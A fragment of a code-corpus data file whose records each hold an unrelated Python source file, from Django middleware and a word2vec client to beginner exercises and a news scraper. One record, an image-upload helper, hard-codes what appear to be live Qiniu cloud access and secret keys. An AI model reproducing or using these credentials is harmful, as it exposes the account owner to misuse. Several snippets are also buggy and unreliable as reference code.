Foundation, Inc., 51\n# Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Any Red Hat\n# trademarks that are incorporated in the source code or documentation are not\n# subject to the GNU General Public License and may only be used or replicated\n# with the express permission of Red Hat, Inc. 
\n#\nfrom constants import *\n\nclass Config:\n def __init__(self):\n self.defaultThemeDir = BASEDIR + \"themes/default/\"\n self.frontend = None\n self.interface = None\n self.mode = MODE_REGULAR\n self.moduleDir = None\n self.moduleList = None\n self.needInterface = False\n self.themeDir = None\n\nconfig = Config()\n","sub_path":"firstboot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"405408177","text":"from django.conf import settings\nfrom django.utils.encoding import smart_str\n\nfrom waffle import FLAGS, COOKIE_NAME, TEST_COOKIE_NAME\n\n\nclass WaffleMiddleware(object):\n def process_request(self, request):\n request.waffles = {}\n request.waffle_tests = {}\n\n if 'waffle_reset' in request.GET:\n # This will reset the cookies in process_response()\n request.waffle_tests.update({name: None for name in FLAGS})\n\n def process_response(self, request, response):\n secure = getattr(settings, 'WAFFLE_SECURE', False)\n max_age = getattr(settings, 'WAFFLE_MAX_AGE', 2592000) # 1 month\n\n if hasattr(request, 'waffles'):\n for k in request.waffles:\n name = smart_str(COOKIE_NAME % k)\n active, rollout = request.waffles[k]\n if rollout and not active:\n # \"Inactive\" is a session cookie during rollout mode.\n age = None\n else:\n age = max_age\n response.set_cookie(name, value=active, max_age=age,\n secure=secure)\n\n if hasattr(request, 'waffle_tests'):\n for k in request.waffle_tests:\n name = smart_str(TEST_COOKIE_NAME % k)\n value = request.waffle_tests[k]\n if value is not None:\n response.set_cookie(name, value=value)\n elif name in request.COOKIES:\n response.delete_cookie(name)\n\n return response\n","sub_path":"waffle/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"228359956","text":"import os\nimport requests\nimport numpy\nimport time\nimport nltk\n\n\nclass Word2Vec:\n __instance = None\n\n @staticmethod\n def get_instance():\n if Word2Vec.__instance is None:\n Word2Vec()\n return Word2Vec.__instance\n\n def __init__(self):\n if Word2Vec.__instance is not None:\n raise Exception(\"This class is a singleton. 
Call get_instance method.\")\n else:\n Word2Vec.__instance = self\n\n self.model = None\n self.useNorm = False\n self.model_path = '{}/../tmp/word2vec_300.bin'.format(os.path.dirname(os.path.realpath(__file__)))\n self.url = \"http://www.robertoderesu.com/ml/word2vec/word-vec\"\n # self.url = \"http://127.0.0.1:8001/word-vec\"\n self.tokenizer = nltk.tokenize.RegexpTokenizer(r\"\\w{3,}\")\n\n def get_embeddings(self, texts, print_every=None):\n if self.model is None:\n self.load_model()\n\n output = []\n n_texts = len(texts)\n for index, text in enumerate(texts):\n words = self.tokenizer.tokenize(text)\n words_embeddings = []\n\n for word in words:\n if word in self.model.vocab:\n word_embedding = self.model.word_vec(word, self.useNorm)\n words_embeddings.append([x.item() for x in word_embedding])\n\n output.append(words_embeddings)\n\n if print_every is not None and index % print_every == 0:\n print(\"Processed {:0.2f}% {}/{}\".format(index / n_texts * 100, index, n_texts))\n\n return output\n\n def get_embeddings_remote(self, texts):\n n_chunks = max(int(len(texts) / 100 + 1), 1)\n # n_chunks = 1\n chunks = [list(x) for x in numpy.array_split(numpy.array(texts), n_chunks)]\n\n result = []\n for text_chunk in chunks:\n request_data = {\n \"texts\": text_chunk,\n \"useNorm\": False\n }\n response = requests.post(self.url, json=request_data)\n response_data = response.json()\n result.extend(response_data)\n\n return result\n\n def load_model(self):\n print(\"Loading model...\")\n start_time_model = time.time()\n\n import gensim\n self.model = gensim.models.KeyedVectors.load_word2vec_format(self.model_path, binary=True)\n\n end_time_model = time.time()\n print(\"Model loaded! Elapsed: \" + str(end_time_model - start_time_model))\n","sub_path":"models/word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"12885510","text":"# 2019-05-27 created with ml_script = \"calculate_enrichment.py\"\n# 2019-07-03 updated with ml_script = \"calculate_enrichment_bootstrap.py\"\n# sarahfong\n\n# using Mary Lauren's script to calculate GTEx eQTL enrichment using the script calculate_enrichment.py\n# FANTOM enhancer architectures were used in this analysis. 
\n# I copied this script from /dors/capra_lab/users/bentonml/resources/bin/calculate_enrichment.py\n\nimport glob\nimport os, sys\n\ntarget = sys.argv[1] \n\n# /dors/capra_lab/projects/enhancer_ages/eqtl/gtex_v7/Whole_Blood_v7_signif_variant_gene_pairs.bed\n\ntarget_id = (target.split(\"/\")[-1]).split(\".\")[0]\n\n#FANTOM Enhancer Architecture\nfantom_path = \"/dors/capra_lab/projects/enhancer_ages/fantom/data/fantom_enh_age/architecture_coordinates/\"\n\n# ML + bootstrap\nml_script = \"/dors/capra_lab/users/fongsl/enh_age/bin/calculate_enrichment_bootstrap.py\"\n\n# Glob FANTOM enhancer architecture files\nfantom = glob.glob(\"%sFANTOM*.bed\" % fantom_path)\n\n# Make an output file\noutfile = \"/dors/capra_lab/projects/enhancer_ages/eqtl/gtex_FANTOM_%s.txt\" % target_id \ntouch = \"touch %s\" % outfile\nos.system(touch) # make a new output file\n\nfor file in fantom:\n file_name = (file.split(\"/\")[-1]).split(\".\")[0]\n cmd = \"python %s %s %s -o %s -i 500\" %(ml_script, file, target, outfile)\n print(file_name, target_id)\n os.system(cmd)","sub_path":"enhancer_age_complexity/eQTL/gtex_calculate_enrichment.py","file_name":"gtex_calculate_enrichment.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"11225743","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Sergio Rozada Doval\r\n\r\n@description: Test the performance of different models and algorithms\r\n\r\n\"\"\" \r\nimport os,sys,inspect\r\ncurrent_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\r\nparent_dir = os.path.dirname(current_dir)\r\nsys.path.insert(0, parent_dir) \r\n\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport architectures\r\nimport numpy as np\r\nimport dynamics as dn\r\nimport rl\r\n\r\n# Model and reward to test algorithms\r\nmodel_path = \"../models/ddrqn\"\r\nreward_path = \"cummulative_reward_ddrqn.pickle\"\r\n\r\nreward = rl.readData(reward_path)\r\n\r\n# Instances of the environment\r\ngenerator = dn.Node(powerSetPoint=3.15)\r\nload = dn.Node(powerSetPoint=-3.30)\r\narea = dn.Area(frequencySetPoint=50,M=0.1,D=0.0160)\r\narea.calculateDeltaF([generator,load])\r\n\r\n# Define list of powers and frequencies\r\npower = []\r\nfrequencies = []\r\n\r\n# Let's tensorflow this\r\ntf.reset_default_graph()\r\ngraph = tf.train.import_meta_graph(model_path+\".meta\")\r\n\r\nsteps = 100\r\nh_s = 100\r\n\r\nwith tf.Session() as session: \r\n # Restore values of the graph\r\n graph.restore(session, model_path)\r\n \r\n # Create the model\r\n lstm = tf.contrib.rnn.BasicLSTMCell(num_units=h_s,state_is_tuple=True)\r\n net = architectures.drqn(h_s,lstm,'net')\r\n n_params = len(net.network_params)\r\n net.createOpHolder(tf.trainable_variables()[0:n_params],1)\r\n \r\n # Initialize variables and copy params\r\n init = tf.variables_initializer(net.network_params)\r\n session.run(init)\r\n session.run(net.update_network_params)\r\n \r\n # Initial state for the LSTM\r\n state = (np.zeros([1,h_s]),np.zeros([1,h_s]))\r\n \r\n for i in range(steps):\r\n \r\n # Store values \r\n power.append(generator.getPower())\r\n frequencies.append(area.getFrequency())\r\n \r\n # Get state and take the best action\r\n current_f = area.getDeltaF()\r\n \r\n a, new_state = session.run([net.predict,net.rnn_state],\r\n feed_dict={net.inputs:np.array(current_f).reshape(1,1),\r\n net.state_in:state,net.batch_size:1, net.trainLength:1})\r\n a = a[0]\r\n \r\n # Take the action, modify environment and 
get the reward\r\n        generator = rl.setDiscretePower(a,generator)\r\n        area.calculateDeltaF([generator,load])\r\n        \r\n        # Update the state\r\n        state = new_state\r\n    \r\nplt.figure(1)\r\nplt.scatter(np.arange(len(reward)),reward)\r\nplt.xlabel('Episodes')\r\nplt.ylabel('Cumulative reward per episode')\r\n\r\nplt.figure(2)\r\nplt.plot(power)\r\nplt.plot([3.3]*100)\r\nplt.xlabel('Steps')\r\nplt.ylabel('Power (MW)')\r\nplt.legend(['Agent power','Power setpoint'])\r\n\r\nplt.figure(3)\r\nplt.plot(frequencies)\r\nplt.plot([50]*100)\r\nplt.xlabel('Steps')\r\nplt.ylabel('Frequency (Hz)')\r\nplt.legend(['System frequency','Frequency setpoint'])\r\n","sub_path":"tests/test_ddrqn.py","file_name":"test_ddrqn.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"435996198","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n    long_description = fh.read()\n\nsetuptools.setup(\n    name='storeimg',\n    version='1.9',\n    author='noinlj',\n    author_email='noinlj@gmail.com',\n    url='https://github.com/noinlijin/storeimg',\n    description=u'A tool which checks whether an image complies with Apple Store specifications',\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    packages=setuptools.find_packages(),\n    platforms=[\"all\"],\n    # install_requires=['Pillow'],\n    classifiers=[\n        \"Programming Language :: Python :: 2.7\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Operating System :: OS Independent\",\n    ],\n    entry_points={\n        'console_scripts': [\n            'storeimg=storeimg:storeimg',\n            'test=storeimg:test'\n        ]\n    }\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"312707279","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport pandas as pd\nimport os\nfrom django.conf import settings\nfrom time import time\n\nclass positionClass:\n    def __init__(self):\n        pass\n\n    def check_positionWords_test(self, df, input_word):\n        for index, row in df.iterrows():\n            if row['职位'] == input_word:\n                return True\n        # no row matched the given position word\n        return False\n\n    def check_positionWords(self, input_word):\n        for index, row in settings.ZW.iterrows():\n            if row['职位'] == input_word:\n                return True\n        # no row matched the given position word\n        return False\n\nif __name__ == '__main__':\n    df = pd.read_csv(os.path.join(os.getcwd(),\"backend\",\"api\",\"ocr\",\"application\",\"position.csv\"),encoding='gbk')\n    input_word = \"JAVA项目经理\"\n    start = time()\n    flag = positionClass().check_positionWords_test(df, input_word.lower())\n    totaltime = time() - start\n    print('cost: ' + str(totaltime))\n    if flag:\n        print(input_word)\n    else:\n        print(\"No matching record found\")\n    \n","sub_path":"backend/api/ocr/application/positions.py","file_name":"positions.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"598896428","text":"from pyecharts.charts import Map,Geo\r\nfrom pyecharts import options as opts\r\n\r\n# turn the data into a list of [province, count] pairs\r\ndef getmaps(provinces, confirmed):\r\n    c_confirmed = confirmed.copy()\r\n    c_confirmed.sort(reverse=True)\r\n    max_value = c_confirmed[0]\r\n    del c_confirmed\r\n\r\n    l = [[provinces[i],confirmed[i]] for i in range(len(provinces))]\r\n    china_confirm_map = 
Map(init_opts=opts.InitOpts(width = \"1200px\", height=\"600px\"))\r\n    china_confirm_map.set_global_opts(\r\n        title_opts=opts.TitleOpts(title=\"2019-nCov\"),\r\n        visualmap_opts=opts.VisualMapOpts(max_=max_value) # maximum of the data range\r\n    )\r\n    china_confirm_map.add(\"2019-nCov confirmed cases by province in China\", l, maptype=\"china\")\r\n    return china_confirm_map\r\n","sub_path":"team/team5/project/pycharts_utils.py","file_name":"pycharts_utils.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"426750796","text":"#Library Fine\n\ntarih1=list(map(int,input().split())) #returned date\ntarih2=list(map(int,input().split())) #due date\n\nif tarih1[2]>tarih2[2]: # returned year is past the due year\n    print(\"10000\")\nelif tarih1[2]<tarih2[2]: # returned in an earlier year\n    print(0)\nelif tarih1[1]>tarih2[1]: # month overdue\n    print(500*(tarih1[1]-tarih2[1]))\nelif tarih1[1]<tarih2[1]: # returned in an earlier month\n    print(0)\nelif tarih1[0]>tarih2[0]: # day overdue\n    print(15*(tarih1[0]-tarih2[0]))\nelse:\n    print(0)\n\n#Cut the sticks\n\nn = int(input())\narr = list(map(int, input().rstrip().split()))\n\nwhile len(arr)>0:\n    print(len(arr))\n    liste=[i-min(arr) for i in arr if (i-min(arr))>0]\n    arr=liste[:]\n\n#nonDivisibleSubset\narr1=list(map(int,input().strip().split()))\narr2=list(map(int,input().strip().split()))\ndef nonDivisible(k,arr):\n    f = [0]*k\n    res=0\n    for i in range(len(arr)):\n        f[arr[i] % k] += 1\n    if (k % 2 == 0) and f[k // 2]:\n        res += 1\n    if f[0]:\n        res += 1\n    for i in range(1, (k + 1) // 2):\n        res += max(f[i], f[k - i])\n    return res\n\nprint(nonDivisible(arr1[1], arr2))\n","sub_path":"hafta_15.py","file_name":"hafta_15.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"197225597","text":"# -*- coding: utf-8 -*-\n\nimport logging\n\nfrom qiniu import Auth,put_data\n\n# access key and secret key that need to be filled in\naccess_key = 'yV4GmNBLOgQK-1Sn3o4jktGLFdFSrlywR2C-hvsW'\nsecret_key = 'bixMURPL6tHjrb8QKVg2tm7n9k8C7vaOeQ4MEoeW'\n\n# bucket to upload into\nbucket_name = 'ihome'\n\ndef upload_image(data):\n    \"\"\"Upload a file to Qiniu cloud storage.\"\"\"\n\n    if not data:\n        return None\n    try:\n        # build the authentication object\n        q = Auth(access_key, secret_key)\n\n        # generate an upload token; an expiry time etc. can be specified\n        token = q.upload_token(bucket_name)\n\n        # upload the file\n        ret, info = put_data(token, None, data)\n\n    except Exception as e:\n        logging.error(e)\n        raise e\n\n    if info.status_code == 200:\n        # return the key of the image saved in Qiniu\n        return ret['key']\n    else:\n        raise Exception('Failed to upload the file to Qiniu')\n\nif __name__ == '__main__':\n    path = '/home/python/Desktop/fruit.jpg'\n    with open(path,'rb') as file:\n        upload_image(file.read())\n\n","sub_path":"utils/image_storage.py","file_name":"image_storage.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"554062487","text":"import numpy as np\nfrom skimage import img_as_float\nfrom skimage.exposure import rescale_intensity\nimport skimage.draw\nfrom skimage.draw import circle\n\ndef mark_with_circle(image: np.ndarray, r: np.float64, c: np.float64, color: str) -> np.ndarray:\n    rgb_lookup = {\n        'red': np.array([255, 0, 0]),\n        'green': np.array([0, 255, 0]),\n        'blue': np.array([0, 0, 255])\n    }\n    new_image = np.copy(image)\n    rr, cc = circle(r, c, radius=2)\n    new_image[rr, cc] = rgb_lookup[color]\n    return new_image\n\ndef mark_two(img0, x1, y1, x2, y2):\n    img1 = mark_with_circle(img0, y1, x1, 'red')\n    img2 = mark_with_circle(img1, y2, x2, 'blue')\n    return img2\n\ndef get_major_axis_line(center, orientation, length=2):\n    (cy, cx) = center\n    (dx, dy) = (length * np.cos(orientation), length * np.sin(orientation))\n    xs = [cx + dx, cx - 
\n\nprint(nonDivisible(arr1[1], arr2))\n","sub_path":"hafta_15.py","file_name":"hafta_15.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"197225597","text":"# -*- coding: utf-8 -*-\n\nimport logging\n\nfrom qiniu import Auth,put_data\n\n# Access key and secret key that must be filled in\naccess_key = 'yV4GmNBLOgQK-1Sn3o4jktGLFdFSrlywR2C-hvsW'\nsecret_key = 'bixMURPL6tHjrb8QKVg2tm7n9k8C7vaOeQ4MEoeW'\n\n# Bucket to upload into\nbucket_name = 'ihome'\n\ndef upload_image(data):\n    \"\"\"Upload interface for Qiniu cloud storage\"\"\"\n\n    if not data:\n        return None\n    try:\n        # Build the authentication object\n        q = Auth(access_key, secret_key)\n\n        # Generate an upload token; an expiry time etc. can be specified\n        token = q.upload_token(bucket_name)\n\n        # Upload the file\n        ret, info = put_data(token, None, data)\n\n    except Exception as e:\n        logging.error(e)\n        raise e\n\n    if 200 == info.status_code:\n\n\n        # Return the key of the image saved in Qiniu cloud storage\n        return ret['key']\n    else:\n        raise Exception('Failed to upload the file to Qiniu cloud storage')\n\nif __name__ == '__main__':\n    path = '/home/python/Desktop/fruit.jpg'\n    with open(path,'rb') as file:\n        upload_image(file.read())\n\n","sub_path":"utils/image_storage.py","file_name":"image_storage.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"554062487","text":"import numpy as np\nfrom skimage import img_as_float\nfrom skimage.exposure import rescale_intensity\nimport skimage.draw\n\ndef mark_with_circle(image : np.ndarray, r: np.float64, c: np.float64, color: str) -> np.ndarray:\n    rgb_lookup = {\n        'red': np.array([255, 0, 0]),\n        'green': np.array([0, 255, 0]),\n        'blue': np.array([0, 0, 255])\n    }\n    new_image = np.copy(image)\n    rr, cc = skimage.draw.circle(r, c, radius=2)  # circle lives in skimage.draw (older scikit-image API)\n    new_image[rr, cc] = rgb_lookup[color]\n    return new_image\n\ndef mark_two(img0, x1, y1, x2, y2):\n    img1 = mark_with_circle(img0, y1, x1, 'red')\n    img2 = mark_with_circle(img1, y2, x2, 'blue')\n    return img2\n\ndef get_major_axis_line(center, orientation, length=2):\n    (cy, cx) = center\n    (dx, dy) = (length * np.cos(orientation), length * np.sin(orientation))\n    xs = [cx + dx, cx - dx]\n    ys = [cy - dy, cy + dy]\n    return (xs, ys)\n\ndef draw_extension(annotate_image, center, orientation, length=10, fill=0.5):\n    \"\"\"\n    Draws lines extending from a center of a given length and orientation.\n\n    Parameters\n    ----------\n    annotate_image : ndarray image\n        The image to annotate\n    center : array-like, length = 2\n        The center of the line, in (row, column) format; will be converted to\n        integer values\n    orientation : float\n        The orientation of the line, in radians.\n    length : float (optional, default = 10)\n        The length of the line on each side\n    fill : whatever the image dtype is (optional, default = 0.5)\n        The value to which each line pixel is set\n\n    Returns\n    -------\n    A copy of the original image with the appropriate line drawn.\n    \"\"\"\n    scaled = np.copy(rescale_intensity(img_as_float(annotate_image)))\n    cs = get_major_axis_line(tuple(center), orientation, length=length)\n    ([x0, x1], [y0, y1]) = cs\n    line = skimage.draw.line(int(y0), int(x0), int(y1), int(x1))\n    for (r, c) in zip(*line):\n        try:\n            scaled[r, c] = fill\n        except IndexError:\n            pass\n    return scaled\n\ndef extend_blobs(binary_image, annotate_image, length=10):\n    # NOTE: get_blobs is assumed to be provided elsewhere in this package.\n    new_image = np.copy(rescale_intensity(img_as_float(annotate_image)))\n    for blob in get_blobs(binary_image):\n        new_image = draw_extension(new_image, blob.centroid, blob.orientation, length=length)\n    return new_image\n","sub_path":"mwCode/markers.py","file_name":"markers.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"136727267","text":"import numpy as np\n\n# Basic logistic regression\ndef logistic_regression(X, y, lr=0.1, steps=1000):\n    '''Calculates the weight matrix W for y_hat = \\sigma(X_ W), where X_ is X\n    with a column of ones appended; the last row of W holds the bias weights\n    \n    - parameters::\n\n    :param X: matrix of features (every observation is a row)\n    :param y: matrix of targets\n    :return: weight matrix\n    :rtype: numpy ndarray\n    '''\n    \n    m,n = X.shape # m: number of observations, n: number of features\n    n += 1 # add the bias\n    \n    # initialize random weights \n    W = (1/np.sqrt(n))*np.random.rand(n, y.shape[1]) # initialization trick\n    \n    X_ = np.zeros((m, n))\n    X_[:,:-1] = X\n    X_[:,-1] = 1 \n    \n    # Batch gradient descent\n    for i in np.arange(steps):\n        y_given_x = evaluate_logreg(X_[:,:-1], W)\n        loss = 0.5*(np.sum(np.square(y_given_x - y)))/m\n        print(\"Loss at epoch {0}: {1}\".format(i, loss))\n        diff = y_given_x - y                     # (m, k) prediction error\n        dsigmoid = y_given_x*(1 - y_given_x)     # elementwise sigmoid derivative\n        dW = X_.T.dot(diff*dsigmoid)/m           # (n, k) gradient of the loss\n        W = W - lr*dW\n    \n    return W\n    \ndef sigmoid(x):\n    '''Calculates sigmoid function given x\n    \n    - parameters::\n\n    :param x: numeric value or array\n    :return: function evaluation\n    :rtype: float or ndarray\n    '''\n    \n    return 1/(np.exp(-x) + 1) # elementwise evaluation\n    \ndef evaluate_logreg(X, W):\n    ''' Evaluate the logistic function given the weights and the input\n    \n    - parameters::\n\n    :param X: matrix of inputs (rows are observations, cols are features)\n    :return: function evaluation\n    :rtype: float or ndarray\n    '''\n    m,n = X.shape\n    n += 1\n    X_ = np.zeros((m, n))\n    X_[:,:-1] = X\n    X_[:,-1] = 1 \n    return sigmoid(X_.dot(W))
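\n\n# Minimal usage sketch: fit the logical OR function on four toy points.\n# X_demo and y_demo are illustrative values, not part of the original module;\n# note that logistic_regression prints the loss at every step.\nif __name__ == '__main__':\n    X_demo = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])\n    y_demo = np.array([[0], [1], [1], [1]])\n    W_demo = logistic_regression(X_demo, y_demo, lr=0.5, steps=200)\n    print(evaluate_logreg(X_demo, W_demo))  # predictions drift toward [0, 1, 1, 1]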
","sub_path":"logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"432959056","text":"# Empty list for storing aliens\naliens = []\n\nnum_aliens = int(input(\"How many aliens do you want? \"))\n\n# Make x Aliens based on input\nfor alien_number in range(num_aliens):\n    new_alien = {\"color\": \"green\", \"points\": 5, \"speed\": \"slow\"}\n    aliens.append(new_alien)\n\n# Upgrade every third alien, starting with the first\nfor alien in aliens[0::3]:\n    if alien[\"color\"] == \"green\":\n        alien[\"color\"] = \"yellow\"\n        alien[\"speed\"] = \"medium\"\n        alien[\"points\"] = 10\n    elif alien[\"color\"] == \"yellow\":\n        alien[\"color\"] = \"red\"\n        alien[\"speed\"] = \"fast\"\n        alien[\"points\"] = 15\n\n# Show the first 20 aliens\nfor alien in aliens[:20]:\n    print(alien)\nprint(\"...\")\n\n# Show how many aliens have been created.\nprint(f\"Total number of aliens: {len(aliens)}\")\n","sub_path":"python_work/chapter06/aliens.py","file_name":"aliens.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"537924186","text":"\"\"\"\nQuestion 1:\n\"\"\"\n\n\ndef crazy_about_9(a, b):\n    if a == 9:\n        return True\n    elif b == 9:\n        return True\n    elif abs(a - b) == 9 or a+b == 9:\n        return True\n    else:\n        return False\n\nprint(crazy_about_9(2, 9))\nprint(crazy_about_9(4, 5))\nprint(crazy_about_9(3, 8))\n\n\n\"\"\"\n-----------------------------------------------------------------------\nQuestion 2:\nA year with 366 days is called a leap year. Leap years are necessary to\nkeep the calendar synchronized with the sun because the earth revolves\naround the sun once every 365.25 days. Actually, that figure is not\nentirely precise, and for all dates after 1582 the Gregorian correction\napplies. Usually years that are divisible by 4 are leap years, for\nexample 1996. However, years that are divisible by 100 (for example,\n1900) are not leap years, but years that are divisible by 400 are leap\nyears (for example, 2000).\n\"\"\"\n\n\ndef leap_year(year):\n    if year % 400 == 0:\n        return True\n    elif year % 100 == 0:\n        return False\n    elif year % 4 == 0:\n        return True\n    else:\n        return False\n\n\nprint(leap_year(1900))\nprint(leap_year(2016))\nprint(leap_year(2017))\nprint(leap_year(2000))\n\n\n\"\"\"\n-----------------------------------------------------------------------\nQuestion 3:\nWrite a function with loops that computes The sum of all squares between\n1 and n (inclusive).\n\"\"\"\ndef sum_squaress(n):\n    total = 0\n    for i in range(1, n + 1):\n        total += i ** 2\n    return total\n\nprint(sum_squaress(1))\nprint(sum_squaress(100))
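\n\n# Sanity check against the closed form n*(n+1)*(2*n+1)/6 (a known identity):\nassert sum_squaress(100) == 100 * 101 * 201 // 6  # == 338350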
","sub_path":"quiz 1.py","file_name":"quiz 1.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"452481902","text":"import re\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom mysqlDB import insert\n\n\ndef openUrl(url):\n    res = requests.get(url)\n    return res.text\n\ndef getTags(html,class_name):\n    reg = r''\n    pattern= re.compile(reg)\n    tags= re.findall(pattern, html)\n    return tags\n\ndef parserData(html):\n    soup_string = BeautifulSoup(html, \"html.parser\")\n    # cheilds = soup_string.find(id=\"newsList\")\n    h3_list = soup_string.findAll('h3')\n    for child in h3_list:\n        href_link = child.a.get('href')\n        if \"https://www\" in href_link:\n            print(href_link)\n            res = openUrl(href_link)\n            parserArticle(res)\n\n\ndef parserArticle(html):\n    soup_string = BeautifulSoup(html, \"html.parser\")\n    cheilds = soup_string.find('h2')\n    article_title = cheilds.string\n    # Initialize fields that are only set conditionally below\n    author_name = ''\n    author_photo = ''\n    release_time = ''\n    if soup_string.select('.osc-avatar')[0].img:\n        author_name = soup_string.select('.osc-avatar')[0].img.get('alt')\n        author_photo = soup_string.select('.osc-avatar')[0].img.get('src')\n    if soup_string.select('.osc-avatar')[0].span:\n        author_name = soup_string.select('.osc-avatar')[0].contents\n\n    if soup_string.select('.extra .item'):\n        release_time = soup_string.select('.extra .item')[0].contents[2]\n    if soup_string.select('.list .item'):\n        release_time = soup_string.select('.list .item')[0].contents[2]\n    article_content = soup_string.find(id='articleContent')\n    news_links = ''\n    print(article_title)\n    if soup_string.select('.news-links'):\n        news_links = soup_string.select('.news-links')[0]\n\n    insert(article_title,author_name,author_photo,release_time,article_content,news_links)\n    # tag = getTags(mainScreen.prettify(),'item')\n    # print(tag)\n\nfor index in range(1000):\n    try:\n        html = openUrl('https://www.oschina.net/news/widgets/_news_index_generic_list?p=%s&type=ajax' %(index))\n        parserData(html)\n    except Exception:\n        pass","sub_path":"news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"320064119","text":"from django.conf.urls import url\n
from . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n    \n    # url(r'^home/$', views.home, name='home'),\n    \n    url(r'^$', views.home_projects, name='homePage'),\n    url(r'^ajax/newsletter/$', views.newsletter, name='newsletter'),\n    url(r'^api/profile/$', views.ProfileList.as_view()),\n    url(r'^edit/profile$', views.edit_profile, name='edit_profile'),\n    url(r'^profile/(?P<id>[0-9]+)$',\n        views.individual_profile_page, name='individual_profile_page'),\n    url(r'^new/project$', views.new_project, name='new_project'),    \n    url(r'^image(\\d+)', views.project, name='project'),    \n    url(r'^new/image$', views.new_image, name='new_image'),    \n    url(r'^api/project/$', views.ProjectList.as_view()),\n\n]\nif settings.DEBUG:\n    urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)    ","sub_path":"awward/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"228352408","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pygame\nimport random\nimport math\n\nSCREEN_DIM = (800, 600)\n\n\nclass Vec2d():\n    def __init__(self, x):\n        self.x = x\n\n    def length(self):\n        \"\"\"returns the length of the vector\"\"\"\n        return math.sqrt(self.x[0] * self.x[0] + self.x[1] * self.x[1])\n\n    def __getitem__(self, i):\n        return self.x[i]\n\n    def int_pair(self):\n        \"\"\"returns the pair of coordinates defining the vector (the coordinates\n        of its end point); the start point coincides with the origin (0, 0)\"\"\"\n        return int(self.x[0]), int(self.x[1])\n\n    def __sub__(self, y):\n        \"\"\"returns the difference of two vectors\"\"\"\n        return self.x[0] - y[0], self.x[1] - y[1]\n\n    @staticmethod\n    def __add__(x, y):\n        \"\"\"returns the sum of two vectors\"\"\"\n        return Vec2d((x[0] + y[0], x[1] + y[1]))\n\n    def __mul__(self, k):\n        \"\"\"returns the product of the vector and a number\"\"\"\n        return Vec2d((self.x[0] * k, self.x[1] * k))\n\n# =======================================================================================\n# Functions responsible for computing the smoothing of the polyline\n# =======================================================================================\n\nclass Polyline():\n    def __init__(self, points, count):\n        self.points = points\n        self.count = count\n    \n    def get_point(self, points, alpha, deg=None):\n        \"\"\"receives 3 base points and a step, e.g. 1/35; the vectors are summed\n        recursively, starting from the very first one:\n        v = add(mul(point[1], 1/35), mul(point[0], 34/35))\n        and the result of each step is fed back in as the second argument:\n        add(mul(point[2], 1/35), mul(v, 34/35))\n        i.e. the first vector is taken with the large coefficient and all the\n        others with the small one; as alpha grows, the first vector gets the\n        small coefficient instead\n        \"\"\"\n        if deg is None:\n            deg = len(points) - 1\n        if deg == 0:\n            return points[0]\n        v1 = points[deg].__mul__(alpha)\n        v2 = self.get_point(points, alpha, deg - 1).__mul__(1 - alpha)\n\n        return Vec2d.__add__(v1, v2)\n\n    def get_points(self, base_points, count):\n        \"\"\"receives 3 base points and the number of steps to add;\n        produces the count intermediate points\n        \"\"\"\n        alpha = 1 